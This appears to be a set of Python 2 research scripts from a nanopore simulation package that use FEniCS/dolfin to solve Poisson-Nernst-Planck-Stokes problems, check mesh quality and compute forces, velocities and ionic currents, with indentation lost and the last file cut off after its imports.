# --- solve 1D problem for "exact" solution ---
pb = solve_pde(SimplePBProblem, geo1D, phys, cyl=True, iterative=False, tolnewton=1e-10)
# define expression for interpolation into 2D
phi = pb.solution
UT = phys.UT
c0 = phys.bulkcon
D = phys.DPore
lscale = phys.lscale
E0 = -lscale*bV/(2.*Rz)
eps = phys.permittivity["water"]
eta = phys.eta
print "Diffusion constant in pore:", D*1e9, "[nm**2/ns]"
print "Constant electric field:", E0, "[V/m]"
def cpPB(x):
return c0*exp(-phi(x)/UT)
def cmPB(x):
return c0*exp(phi(x)/UT)
def pPB(x):
return -2.*c0*cFarad*UT*(math.cosh(phi(x)/UT) - math.cosh(phi(0.)/UT))
def uPB(x):
return eps*E0/eta*(phi(x[0]) - phi(R))
class vPB(Expression):
def eval(self, value, x):
value[0] = bV*x[1]/(2.*Rz) + phi(x[0])
class JpPB(Expression):
def eval(self, value, x):
value[0] = D/UT*E0*cpPB(x[0])
class JmPB(Expression):
def eval(self, value, x):
value[0] = -D/UT*E0*cmPB(x[0])
# compute current
r2pi = Expression("2*pi*x[0]")
J_PB = assemble(Constant(cFarad*D/UT*E0*c0/lscale**2)*(exp(-phi/UT) + exp(phi/UT))*r2pi*dx)
print "J (PB): %s [A]" % J_PB
# --- define physical parameters and customized BCs of 2D problem ---
# constant Dirichlet BCs for v, cp, cm on wall,
# non-zero flux BCs on top/bottom
n = FacetNormal(geo2D.mesh)
lscale = Constant(phys.lscale)
phys_params.update(
cp0 = dict(wall = c0*exp(-phi(R)/UT)),
cm0 = dict(wall = c0*exp(+phi(R)/UT)),
v0 = dict(wall = vPB()),
cpflux = dict(bulk = JpPB()*n[1]),
cmflux = dict(bulk = JmPB()*n[1]),
)
phys = Physics("pore", geo2D, **phys_params)
phys.surfcharge.update(
upperb = lscale*eps*bV/(2.*Rz),
lowerb = -lscale*eps*bV/(2.*Rz),
)
# --- solve 2D PNP+Stokes problem ---
# the goal functional: current through crosssection
grad = phys.grad
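# Jsurf measures the ionic current as a surface integral over the
# cross-section facets, Jvol as a volume average over the thin slab of
# thickness hcross; both should converge to the 1D PB reference value J_PB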
def J(U, geo):
v, cp, cm = U
Jp = Constant(D)*(-grad(cp) - Constant(1/UT)*cp*grad(v))
Jm = Constant(D)*(-grad(cm) + Constant(1/UT)*cm*grad(v))
Jsurf = avg(Constant(cFarad/lscale**2)*(Jp - Jm)[1] * r2pi) * geo.dS("cross")
Jvol = Constant(cFarad/lscale**2/hcross)*(Jp - Jm)[1] * r2pi * geo.dx("cross")
return dict(Jsurf=Jsurf, Jvol=Jvol)
def saveJ(self):
self.save_estimate("(Jsing_h - J)/J", abs((self.functionals["Jsurf"].value()-J_PB)/J_PB),
N=self.solution.function_space().dim())
self.save_estimate("(J_h - J)/J", abs((self.functionals["Jvol"].value()-J_PB)/J_PB),
N=self.solution.function_space().dim())
# solve #inside_loop=saveJ,
pnps = solve_pde(SimplePNPProblem, geo2D, phys, cyl=True, newtondamp=1., goals=[J],
refinement=True, marking_fraction=.5, maxcells=Nmax, iterative=False)
pnps.visualize()
exit()
v, cp, cm = pnps.solutions()
stokes = solve_pde(SimpleStokesProblem, geo2D, phys, cyl=True, conservative=False, f=-cFarad*(cp-cm)*grad(v), ku=2, beta=0.)
# --- visualization ---
#plot(-cFarad*(cp-cm)*grad(v)[1]/(lscale**2*eta), title="electroosmotic forcing [m/s]")
#pnps.visualize()
#stokes.visualize()
(u, p) = stokes.solutions()
#fig = plot1D({"phi PB":phi}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "potential [V]"))
#plot1D({"phi PNP (2D)": v}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "potential [V]"), fig=fig)
#fig = plot1D({"c+ PB":cpPB, "c- PB":cmPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "concentration [mol/m**3]"))
#plot1D({"c+ PNP (2D)": cp, "c- PNP (2D)": cm}, (0., R, 101), "x", origin=(0.,-Rz), dim=2, axlabels=("r [nm]", "concentration [mol/m**3]"), fig=fig)
#plot1D({"c+ PNP (2D)": cp, "c- PNP (2D)": cm, "c+ PB":lambda x: cpPB(0.), "c- PB":lambda x: cmPB(0.)},
# (-Rz, Rz, 101), "y", origin=(.0*R, 0.), dim=2, axlabels=("z [nm]", "concentration [mol/m**3]"))
fig = plot1D({"uz PB":uPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
fig = plot1D({"uz PNP (2D)":u[1]}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
#fig = plot1D({"ur PB":lambda x:0.}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
#fig = plot1D({"ur PNP (2D)":u[0]}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
fig = plot1D({"p PB":pPB}, (0., R, 101), "x", dim=1, axlabels=("r [nm]", "velocity [m/s]"))
fig = plot1D({"p PNP (2D)":p}, (0., R, 101), "x", dim=2, axlabels=("r [nm]", "velocity [m/s]"), fig=fig)
#pnps.estimators["(Jsing_h - J)/J"].plot(rate=-1.)
#pnps.estimators["(J_h - J)/J"].plot(rate=-1.)
showplots()
```
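The assembled `J_PB` is just a radial quadrature of the Poisson-Boltzmann ion densities in the constant axial field. A minimal numpy sketch of the same integral, assuming a callable radial potential `phi(r)` and the same constants (`cFarad`, `D`, `UT`, `E0`, `c0`, `lscale`) as in the script above:

```python
# Quadrature version of J_PB = int_0^R cFarad*D/UT*E0*c0*(exp(-phi/UT) + exp(phi/UT)) * 2*pi*r dr / lscale**2
import numpy as np

def pb_current(phi, R, D, UT, E0, c0, cFarad=96485.332, lscale=1e9, n=2000):
    r = np.linspace(0., R, n)
    dens = np.array([np.exp(-phi(x)/UT) + np.exp(phi(x)/UT) for x in r])
    integrand = cFarad*D/UT*E0*c0/lscale**2 * dens * 2.*np.pi*r
    return np.trapz(integrand, r)  # should agree with the assembled J_PB
```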
#### File: scripts/numerics/H3Drefine.py
```python
" assess mesh quality of howorka geometry and how it changes with uniform refinement and snapping "
from nanopores import *
from nanopores.geometries.curved import Cylinder, Sphere, Circle
from dolfin import *
from matplotlib import pyplot
geo_name = "H_cyl_geo"
nm = import_vars("nanopores.geometries.%s.params_geo" %geo_name)["nm"]
add_params(
h = 3.,
z0 = 2.,
ratio = .1,
nref = 1,
)
geo_params = dict(
x0 = [0., 0., nm*z0],
rMolecule = nm*0.5,
lcCenter = nm*0.1, #1,
lcMolecule = nm*0.05, #025,
)
generate_mesh(h, geo_name, optimize=True, **geo_params)
geo = geo_from_name(geo_name, **geo_params)
print geo._bou2phys
#plot(geo.submesh("pore"))
plot_sliced(geo)
# define sphere for molecule
molec = Sphere(R=geo.params["rMolecule"], center=geo.params["x0"])
# define cylinders for inner and outer DNA boundary and side boundary
innerdna = Cylinder(R=geo.params["r0"], L=geo.params["l0"])
outerdna = Cylinder(R=geo.params["r1"], L=geo.params["l0"])
side = Cylinder(R=geo.params["R"], L=2.*geo.params["Rz"])
curved = dict(
moleculeb = molec.snap,
innerdnab = innerdna.snap,
outerdnab = outerdna.snap,
membranednab = outerdna.snap,
sideb = side.snap,
outermembraneb = side.snap,
)
def mesh_quality(mesh, oldmesh=None, ratio=1e-1):
#vertex = VertexFunction("bool", mesh, False)
dgncells = CellFunction("size_t", mesh, 0)
for c in cells(mesh):
if c.radius_ratio() < ratio:
dgncells[c] = 1
#if c.radius_ratio() < 1e-5:
#print 'Degenerate cell', c.index(), ', radius ratio', c.radius_ratio()
#for v in vertices(c):
#vertex[v] = True
#if c.radius_ratio() < 1e-6:
# print ' ', v.point().str()
minrr = MeshQuality.radius_ratio_min_max(mesh)[0]
print "Minimal radius ratio of mesh:", minrr
pyplot.figure()
exec(MeshQuality.radius_ratio_matplotlib_histogram(mesh, 200), locals())
# plot degenerate cells
if minrr < ratio:
submesh = SubMesh(mesh, dgncells, 1)
title = "degenerate N=%s" %mesh.num_cells()
#plot(submesh, title=title)
geo_sub = geo_from_subdomains(submesh,
"nanopores.geometries.%s.subdomains" %geo.params["name"], **geo.params)
plot(geo_sub.boundaries, title="boundaries "+title)
# find degenerate cells before snapping
if oldmesh is not None:
oldmesh = refine(oldmesh)
oldcells = CellFunction("size_t", oldmesh, 0)
oldcells.array()[:] = dgncells.array()
plot(SubMesh(oldmesh, oldcells, 1), "old degenerate cells N=%s" %mesh.num_cells())
# mesh quality before refinement
mesh = geo.mesh
print "Number of cells:", mesh.num_cells()
mesh_quality(mesh, ratio=ratio)
#interactive()
for i in range(nref):
# Mark cells for refinement
markers = CellFunction("bool", mesh, True)
# Refine mesh
mesh = refine(mesh, markers)
print "Number of cells:", mesh.num_cells()
geo.adapt(mesh)
mesh_quality(mesh, ratio=ratio)
# snap curved boundaries
for boundary, snap in curved.items():
print "Adapting curved boundary '%s'." % boundary
geo.snap_to_boundary(boundary, snap)
mesh_quality(mesh, ratio=ratio)
#areCh = assemble(Constant(1.)*geo.dS("dnab"))
#print "Area (approx):", areCh
#print "Error A:", abs(areCh - areC)
print "hmin [nm]: ", geo.mesh.hmin()/nm
plot_sliced(geo)
interactive()
```
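The quality measure driving `mesh_quality` above is the radius ratio, normalized so that an equilateral simplex scores 1 (assuming DOLFIN's convention dim * inradius / circumradius). A self-contained sketch for a single triangle, for illustration only:

```python
import numpy as np

def radius_ratio_triangle(p0, p1, p2):
    # edge lengths
    a = np.linalg.norm(np.subtract(p1, p2))
    b = np.linalg.norm(np.subtract(p0, p2))
    c = np.linalg.norm(np.subtract(p0, p1))
    s = 0.5*(a + b + c)                                 # semi-perimeter
    area = np.sqrt(max(s*(s - a)*(s - b)*(s - c), 0.))  # Heron's formula
    return 2.*(area/s)/(a*b*c/(4.*area))                # dim * inradius / circumradius

print(radius_ratio_triangle((0., 0.), (1., 0.), (0.5, np.sqrt(3.)/2.)))  # equilateral -> ~1.0
print(radius_ratio_triangle((0., 0.), (1., 0.), (0.5, 1e-3)))            # nearly degenerate -> close to 0
```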
#### File: scripts/numerics/velocity.py
```python
import dolfin, os
import numpy as np
import matplotlib.pyplot as plt
from nanopores.models import Howorka
from nanopores.models.diffusion import friction_tensor, friction
import nanopores.tools.fields as fields
import nanopores
from nanopores import (LinearPBGoalOriented, LinearPBAxisymGoalOriented,
PNPSAxisym, PNPS, StokesProblem, PNPProblem, HOME,
Physics, user_params)
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
FIGDIR = os.path.join(HOME, "Dropbox", "nanopores", "figures")
fields.set_dir(DATADIR)
def pbpnps(geo, phys, cyl=False, frac=0.5, Nmax=1e4, cheapest=False,
taylorhood=False, stokesLU=False, **kwargs):
if not stokesLU and not cyl:
StokesProblem.method["iterative"] = True
else:
StokesProblem.method["iterative"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-10
PNPProblem.method["kparams"]["absolute_tolerance"] = 1e-6
PNPProblem.method["kparams"]["nonzero_intial_guess"] = False
#StokesProblemEqualOrder.beta = 1.
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
PNPS.tolnewton = 1e-3
PNPS.alwaysstokes = True
LinearPB = LinearPBAxisymGoalOriented if cyl else LinearPBGoalOriented
PNPStokes = PNPSAxisym if cyl else PNPS
z = phys.dim - 1
bV = phys.bV
phys.bV = 0.
goal = (lambda v : phys.Fbare(v, z)) if geo.parameter("x0") else (lambda v : phys.CurrentPB(v))
pb = LinearPB(geo, phys, goal=goal)
phys.bV = bV
pb.maxcells = Nmax
pb.marking_fraction = frac
if cheapest:
pb.estimate = pb.estimate_cheap
refined = True
i = 0
print "Number of cells:", pb.geo.mesh.num_cells()
while refined:
i += 1
print "\nSolving PB."
pb.single_solve()
print "\nError estimation."
(ind, err) = pb.estimate()
print "\nMesh refinement."
refined = pb.refine(ind)
if not refined:
print "Maximal number of cells reached."
else:
print "New total number of cells:", pb.geo.mesh.num_cells()
pnps = PNPStokes(pb.geo, phys, v0=pb.solution, taylorhood=taylorhood)
print "\nSolving PNPS."
dofs = pnps.dofs()
print " Degrees of freedom: %d" % dofs
newton_iter = pnps.newton_solve()
print " Newton iterations:", newton_iter
return pb, pnps
def pnps(geo, phys, cyl=False, taylorhood=False, stokesLU=True, **kwargs):
if not stokesLU and not cyl:
StokesProblem.method["iterative"] = True
else:
StokesProblem.method["iterative"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-10
PNPProblem.method["kparams"]["absolute_tolerance"] = 1e-6
PNPProblem.method["kparams"]["nonzero_intial_guess"] = False
#StokesProblemEqualOrder.beta = 1.
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
PNPS.tolnewton = 1e-3
PNPS.alwaysstokes = True
PNPStokes = PNPSAxisym if cyl else PNPS
pnps = PNPStokes(geo, phys, taylorhood=taylorhood)
print "\nSolving PNPS."
dofs = pnps.dofs()
print " Degrees of freedom: %d" % dofs
newton_iter = pnps.newton_solve()
print " Newton iterations:", newton_iter
return pnps
<EMAIL>("howorka_nonzero_u")
#def F(x, v=None, dim=3, **params):
# values = []
# setup = Howorka.setup3D if dim==3 else Howorka.setup2D
# cyl = dim==2
# for x0 in x:
# geo, phys = setup(x0=x0, **params)
# if v is not None:
# phys.update(UMol=tuple(v))
# #dolfin.plot(geo.submesh("solid"), key="b", title="solid mesh")
# pb, pnps = pbpnps(geo, phys, cyl=cyl, **params)
# #dolfin.plot(geo.submesh("solid"), key="b", title="solid mesh")
# values.append(pnps.forces())
# pnps.visualize("fluid")
# F, Fel, Fdrag = tuple(zip(*values))
# return dict(F=F, Fel=Fel, Fdrag=Fdrag)
#print F([[0.2,0.,4.6798]], Nmax=5e4, UMol=(0., 0.1, 0.1), dim=3, dnaqsdamp=0.5,
# taylorhood=False, cheapest=True, cache=False, h3D=8.,
# stokesLU=True)
#print F([[0.,0.,4.6798]], Nmax=5e4, UMol=(0., 0.1), dim=2, dnaqsdamp=0.5,
# taylorhood=False, cheapest=True, cache=False, h3D=8.,
# stokesLU=True)
class Values(list):
def __str__(self):
return str(self[-1])
def tolist(self):
return [x.tolist() for x in self]
def velocity_iteration(setup, imax=15):
dim = setup.geop.dim
gamma = friction_tensor(setup) if dim==3 else np.diag([friction(setup)])
geo = setup.geo
#dolfin.plot(geo.boundaries)
#dolfin.interactive()
f, v, dv = Values(), Values(), Values()
# iteratively update v
v.append(np.array([0.]*dim))
for i in range(imax):
print "\n--- Loop %d ---" %(i+1,)
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
phys.update(UMol=tuple(v[-1]))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
Force, Fel, Fdrag = pde.forces()
if dim==2: Force = [Force[1]]
f.append(1e-12*np.array(Force))
print "f =", f
dv0 = np.linalg.solve(gamma, f[-1])
if dim==2: dv0 = np.array([0., float(dv0)])
dv.append(dv0)
print "dv =", dv
v.append(v[-1] + dv[-1])
print "v =", v
#pde.visualize()
v.pop(0)
return f, v, dv
@nanopores.tools.solvers.cache_forcefield("howorka_velo2")
def velocities(X, **params):
v0, v1 = [], []
for x0 in X:
setup = Howorka.Setup(x0=x0, **params)
f, v, dv = velocity_iteration(setup, 6)
assert np.linalg.norm(1e12*f[-1]) < 1e-3
#assert np.linalg.norm(dv[-1]) < 1e-3*np.linalg.norm(dv[0])
v0.append(list(v[0]))
v1.append(list(v[-1]))
return dict(v0=v0, v1=v1)
def velo2force_2D(v, setup):
geo = setup.geo
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
vv = [0.]*setup.geop.dim
vv[-1] = v
phys.update(UMol=tuple(vv))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
v, cp, cm, u, p = pde.solutions()
dolfin.plot(u)
Force, Fel, Fdrag = pde.forces()
return 1e-12*Force[1]
def velo2force_3D(v, setup):
geo = setup.geo
phys = Physics("howorka", geo, **setup.physp)
phys.update(Qmol=phys.Qmol*phys.qq)
phys.update(UMol=tuple(v))
pde = pnps(geo, phys, cyl=setup.phys.cyl)
#v, cp, cm, u, p = pde.solutions()
#dolfin.plot(u)
pde.visualize("fluid")
Force, Fel, Fdrag = pde.forces()
return 1e-12*Force[-1] #[1e-12*f for f in Force]
#<EMAIL>.solvers.cache_forcefield("howorka_veloforce")
def nonzero_velocities_2D(V, **params):
setup = Howorka.Setup(**params)
gamma = friction(setup)
print "friction gamma", gamma
# determine F(0), only once
if not 0. in V:
V.append(0.)
V.sort()
F = [None]*len(V)
i0 = V.index(0.)
F[i0] = velo2force_2D(0., setup)
F0 = F[i0]
print "F(0)", F0
for i, v in enumerate(V):
if not i == i0:
print "\n--- Velocity %d ---" %(i+1,)
F[i] = velo2force_2D(v, setup)
print "Velocity", v
print "Force (exact)", F[i]
print "Force (linear)", F0 - gamma*v
return F, gamma, F0
params = user_params(dim=3, Nmax=1.5e5, h=1., dnaqsdamp=0.25,
x0=[0.2,0.,4.01], Qmol=-1., bulkcon=300.)
setup = Howorka.Setup(**params)
setup.prerefine()
velo2force_3D([0., 0.1, 0.2], setup)
do_v2f = False
redo_v2f = False
if do_v2f:
if redo_v2f:
params = user_params(dim=2, Nmax=2e4, h=.5, dnaqsdamp=0.25,
x0=[0.,0.,4.5], Qmol=-1., bulkcon=300.)
V = list(np.linspace(-1., 1., 3))
F, gamma, F0 = nonzero_velocities_2D(V, **params)
fields.save_entries("howorka_velo2force_3", params, V=V, F=F, gamma=gamma, F0=F0)
fields.update()
dolfin.interactive()
data = fields.load_file("howorka_velo2force_3")
V, F, F0, gamma = tuple(data[key] for key in ["V", "F", "F0", "gamma"])
ax = plt.axes()
ax.axhline(y=0, color='#999999', linewidth=0.5)
ax.axvline(x=0, color='#999999', linewidth=0.5)
#ax.plot(V, [0.]*len(V), "-", color="#999999")
ax.plot(V, [1e12*(F0 - gamma*v) for v in V], "-g", label=r"$F(0) - \gamma v$")
ax.plot(V, [1e12*f for f in F], ".b", label=r"$F(v)$")
ax.set_ylabel("force [pN]")
ax.set_xlabel("velocity [m/s]")
ax.legend(loc="best")
#ax.grid()
fig = plt.gcf()
fig.set_size_inches((4,3))
#nanopores.savefigs("howorka_v2f_2", FIGDIR)
plt.show()
do_profile = False
if do_profile:
# working 3D setup
params = user_params(dim=3, Nmax=1.5e5, h=1., dnaqsdamp=0.25,
Qmol=-1., bulkcon=300.)
# 2D setup
#params = user_params(dim=2, Nmax=2e4, h=.5, dnaqsdamp=0.25,
# Qmol=-1., bulkcon=300.)
# along axis
#Z = np.linspace(-6., 6., 42)
#X = [[0.,0.,z] for z in Z]
    # at cross-section
r0 = Howorka.params_geo3D.r0
rMol = Howorka.default_geop.rMolecule
eps = 1e-2
R = r0 - rMol - eps
Z = np.linspace(-R, R, 21)
X = [[z,0.,0.] for z in Z]
#X = [[0.,0.,0.]]
print velocities(X, nproc=7, name="howorka_velo3D_2", **params)
do_plot = False
redo_plot = False
if do_plot:
imax = user_params(imax=15)["imax"]
if redo_plot:
x = [0.2, 0., 0.]
#x = [0., 0., 0.]
setup = Howorka.Setup(x0=x, **params)
f, v, dv = velocity_iteration(setup, imax)
nanopores.save_stuff("velocity_iteration", f.tolist(), v.tolist(), dv.tolist())
f, v, dv = nanopores.load_stuff("velocity_iteration")
dim = params["dim"]
plt.semilogy(range(1, imax+1), 1e12*np.sqrt(np.sum(np.array(f)**2, 1)),
"s-", label="net force on molecule")
plt.ylabel("force [pN]")
plt.xlabel("# iterations")
plt.xlim(xmin=1, xmax=imax)
plt.xticks(range(1,imax+1))
plt.legend(loc="best")
fig = plt.gcf()
fig.set_size_inches((4,3))
nanopores.savefigs("howorka_velocity_3D_z0", FIGDIR)
```
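The loop in `velocity_iteration` above is a fixed-point iteration v <- v + gamma^-1 F(v) that drives the net force on the molecule to zero. A toy sketch with a hypothetical linear force model F(v) = F0 - gamma*v, for which the iteration lands on v = gamma^-1 F0:

```python
import numpy as np

def iterate_velocity(F, gamma, v0, imax=15):
    v = np.array(v0, dtype=float)
    for _ in range(imax):
        f = F(v)                           # net force at the current velocity
        v = v + np.linalg.solve(gamma, f)  # friction tensor maps force to velocity update
    return v

gamma = np.diag([2.0e-11]*3)       # hypothetical friction tensor [kg/s]
F0 = np.array([0., 0., 1.5e-11])   # hypothetical bare force [N]
print(iterate_velocity(lambda v: F0 - gamma.dot(v), gamma, [0., 0., 0.]))
# -> [0.   0.   0.75], i.e. gamma^-1 * F0 along z
```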
#### File: scripts/plot_forces_aHem/calculateforce.py
```python
import math
import numpy as np
from nanopores import *
from nanopores.physics.exittime import ExitTimeProblem
from dolfin import *
def calculateforce(clscale=10., subdomain=None):
geo_params = dict(
l3 = 15.,#60
l4 = 10.,
R = 15.,#60
x0 = None, #[5., 0., 10.], # |x0| > 2.2
exit_i = 1,
)
phys_params = dict(
bV = .5,
ahemqs = 0.01,
rTarget = 0.5*nm,
bulkcon = 1000.,
)
skip_stokes = False
StokesProblem.method["iterative"] = True
taylorhood = True # if True, use P2-P1 discretization for Stokes instead of P1-P1.
    # (True leads to a much bigger system but better convergence of the iterative solver)
StokesProblem.method["kparams"].update(
monitor_convergence = False,
relative_tolerance = 1e-10,
absolute_tolerance = 1e-5,
maximum_iterations = 2000,
nonzero_initial_guess = True,
)
t = Timer("meshing")
meshdict = generate_mesh(clscale, "aHem", **geo_params)
print "Mesh generation time:",t.stop()
t = Timer("reading geometry")
geo = geo_from_xml("aHem")
print "Geo generation time:",t.stop()
phys = Physics("pore_molecule", geo, **phys_params)
pde = PNPS(geo, phys, taylorhood=taylorhood)
pde.tolnewton = 1e-2
if skip_stokes:
pde.solvers.pop("Stokes")
pde.solve()
(v, cp, cm, u, p) = pde.solutions(deepcopy=True)
F, Fel, Fdrag = phys.Forces(v, u)
# save mesh and forces
File("mesh.xml") << geo.mesh
File("F.xml") << F
File("Fel.xml") << Fel
File("Fdrag.xml") << Fdrag
for domain in ["pore", "poretop", "porecenter", "porebottom", "fluid_bulk_top", "fluid_bulk_bottom"]:
print "Average F in %s:"%domain, assemble(F[2]*geo.dx(domain))/assemble(Constant(1.0)*geo.dx(domain))
return geo.mesh, v
#VV = VectorFunctionSpace(geo.mesh, "CG", 1)
#return project(F, VV)
def loadforces():
mesh = Mesh("mesh.xml")
V = VectorFunctionSpace(mesh, "CG", 1)
F = Function(V, "F.xml")
Fel = Function(V, "Fel.xml")
Fdrag = Function(V, "Fdrag.xml")
return F, Fel, Fdrag
#def loadforces2():
# mesh = Mesh("mesh_test_drag.xml")
# V = VectorFunctionSpace(mesh, "CG", 1)
# F = Function(V, "F_test_drag.xml")
# Fel = Function(V, "Fel_test_drag.xml")
# Fdrag = Function(V, "Fdrag_test_drag.xml")
# return F, Fel, Fdrag
if __name__ == "__main__":
add_params(scale = 10.)
mesh, v = calculateforce(clscale=scale)
```
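A usage sketch for the helpers above; it assumes `calculateforce()` has already been run from this directory (so `mesh.xml`, `F.xml`, `Fel.xml`, `Fdrag.xml` exist) and that coordinates use the same length units as `geo_params`:

```python
import numpy as np
from calculateforce import loadforces

F, Fel, Fdrag = loadforces()
for z in np.linspace(-5., 5., 5):
    # z-component of the total force along the pore axis
    print("z = %.1f, Fz = %.3g N" % (z, F([0., 0., z])[2]))
```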
#### File: scripts/plot_scripts/current_trace_2D.py
```python
from nanopores import *
from dolfin import *
geo_name = "H_geo"
nm = 1e-9
params = dict(
Ry = 30*nm,
Rx = 15*nm,
rMolecule = 0.77*nm,
r0 = 1.2*nm,
)
phys_params = {"Membraneqs": -0.03, "bV": -0.1, "Qmol": -0*qq,}
def drange(start, stop, step):
r = start
while min(start,stop) <= r <= max(start,stop):
yield r
r += step
def save(data, fname):
with open('%s.txt' % fname, 'w') as f:
f.write('\n'.join([str(s) for s in data]))
def load(fname):
with open('%s.txt' % fname, 'r') as f:
data = f.read().split('\n')
return data
Ry_ = params["Ry"]-2*params["rMolecule"]
Z = []
V = []
I = []
ndigits = 9+4
for z in drange(Ry_, -Ry_, -1*nm):
z = round(z, ndigits)
print "\nz = ",z,"\n"
Z.append(z*1e9)
x0 = [0, 0, z]
meshgen_dict = generate_mesh(0.5, geo_name, x0 = x0, **params)
geo = geo_from_name(geo_name, x0 = x0, **params)
PNPSAxisym.tolnewton = 1e-1
pnps = PNPSAxisym(geo, **phys_params)
pnps.solve(refinement=False, save_mesh=False)
(v,cp,cm,u,p) = pnps.solutions()
I0 = -pnps.get_functionals()["Javgbtm"] if z>0 else -pnps.get_functionals()["Javgtop"]
I.append(I0)
V.append(v([0.0, 10*nm]) - v([0.0, -10*nm]))
#print "I (current through pore center):",I,"[pA]"
#print "V (transmembrane potential):",V,"[V]"
#print "conductance I/V:",I/V,"[pS]"
from numpy import isnan
for i,x in enumerate(V):
if isnan(x):
V[i] = V[i-1]
I[i] = I[i-1]
#for s in ["Z","I","V"]:
# save(vars()[s], s)
import matplotlib.pyplot as plt
label = "r = %.2fnm" %(params["rMolecule"]*1e9,)
fname = "current_%dmV_%de_%.2fnm.eps" %(int(phys_params["bV"]*1000), int(phys_params["Qmol"]/qq), params["rMolecule"]*1e9)
plt.plot(Z,I, label=label)
plt.xlabel("z-coordinate of molecule center [nm]")
plt.ylabel("current [pA]")
plt.legend(loc='lower right')
plt.savefig(fname, bbox_inches='tight')
```
#### File: scripts/pughpore/hack_pugh2D.py
```python
import nanopores.tools.box as box
import nanopores.tools.balls as balls
import nanopores.geometries.pughpore as pugh
import nanopores.py4gmsh as gmsh
Box = balls.Box
pugh.set_tol(1e-5)
dom = pugh.get_domain_cyl()
dom.addboundaries(leftb=dom.boundary("left"))
left = dom.getboundary("leftb")
mol = pugh.EmptySet()
dom.addsubdomain(mol, "molecule")
dom.addboundary(mol.boundary() - left, "moleculeb")
dom.compute_entities()
dom.compute_boundaries(True)
# points of half circle
x0 = [0.,-15.]
r = 2.
lcMolecule = 0.4
lc = 1.
def entity2box(ent):
intervals = [(f if isinstance(f, tuple) else (f,f)) for f in ent]
return Box(intervals=intervals)
edgeinds = list(left.indexsets[1])
edgeents = [dom.entities[1][i] for i in edgeinds]
edge = [entity2box(dom.entities[1][i]) for i in edgeinds]
points = [(x0[0], x0[1]-r), tuple(x0), (x0[0], x0[1]+r)]
circle = [Box(points[i], points[i+1]) for i in range(len(points)-1)]
N = len(edge)
dic = box.multi_box_union(edge + circle)
# add additional point entities
for p in dic["entities"][0]:
if not p in dom.entities[0]:
dom.entities[0].append(p)
# add new edge entities and compute replacement
replace = {i:[] for i in edgeinds}
circleb = []
for s, ent in zip(dic["esets"][1], dic["entities"][1]):
for j in s:
if j < len(edgeinds): # is old edge
i = edgeinds[j]
replace[i].append(ent)
if j >= len(edgeinds): # belongs to circle
print j
circleb.append(ent)
for k in replace.keys():
for i, ent in enumerate(replace[k]):
if ent in dom.entities[1]:
j = dom.entities[1].index(ent)
else:
dom.entities[1].append(ent)
j = len(dom.entities[1]) - 1
print j, ent
replace[k][i] = j
for k, v in replace.items():
if len(v)==1 and k==v[0]:
replace.pop(k)
print replace
old = set(replace.keys())
new = box.union(set(v) for v in replace.values())
# replace edge indices in boundary
left.indexsets[1] = left.indexsets[1] - old | new
# compute left circle boundary
for i, ent in enumerate(circleb):
if ent in dom.entities[1]:
j = dom.entities[1].index(ent)
else:
dom.entities[1].append(ent)
j = len(dom.entities[1]) - 1
circleb[i] = j
print "circle:", circleb
# gmsh circle
lcCirc = lcMolecule*lc
m0, m1 = x0[0], x0[1]
pcirc = [(m0, m1), (m0, m1-r), (m0+r, m1), (m0, m1+r)]
dom.entities[0].append(pcirc[2])
dom.gmsh_entities = [[None for e in k] for k in dom.entities]
pcirc = [dom.entity_to_gmsh(p, 0, lcCirc) for p in pcirc]
surfs = [gmsh.Circle([pcirc[1], pcirc[0], pcirc[2]]),
gmsh.Circle([pcirc[2], pcirc[0], pcirc[3]])]
dom.gmsh_entities[1] += surfs
N = len(dom.gmsh_entities[1])
circlearc = [N-2, N-1]
for k, v in replace.items():
removed = False
for j in list(v):
print "adding", j,"to replace"
if j in circleb:
replace[k].remove(j)
removed = True
if removed:
replace[k].extend(circlearc)
print replace
# add edge indices to molecule boundary
mol.bdry().indexset = set(circleb + circlearc)
mol.bdry().indexsets[1] = set(circleb + circlearc)
for i in circleb:
mol.bdry().orients[i] = -1
for i in circlearc:
mol.bdry().orients[i] = 1
# replace edge indices sub.boundaries
for sub in dom.subdomains + dom.boundarysubs:
iset = sub.bdry().indexset
orients = sub.bdry().orients
for i in iset & old:
iset.remove(i)
for j in replace[i]:
iset.add(j)
if j in circlearc:
orients[j] = -1
else:
orients[j] = orients[i]
print sub.name, i, j, orients[j]
dom.entities_to_gmsh_merge(lc)
# rebuild boundaries involving balls
for bou in dom.boundaries:
bou.indexset = bou.csg.evalsets()[1]
dom.physical_to_gmsh(True)
dom.geo = box.to_mesh()
dom.geo.params = dom.params
if hasattr(dom, "synonymes"):
dom.geo.import_synonymes(dom.synonymes)
dom.plot()
```
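For reference, `entity2box` above only normalizes an entity's coordinates into intervals, turning a point p into the degenerate interval (p, p); the interval extraction can be checked in isolation:

```python
ent = ((0., 3.), -15.)   # hypothetical 1D entity: an edge spanning r in [0, 3] at z = -15
intervals = [(f if isinstance(f, tuple) else (f, f)) for f in ent]
print(intervals)         # [(0.0, 3.0), (-15.0, -15.0)]
```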
#### File: scripts/pughpore/passagetime-simple.py
```python
from __future__ import unicode_literals
# (c) 2017 <NAME>
# TODO: obtain rD from actual simulation
from nanopores import fields, kT, eta, qq, savefigs
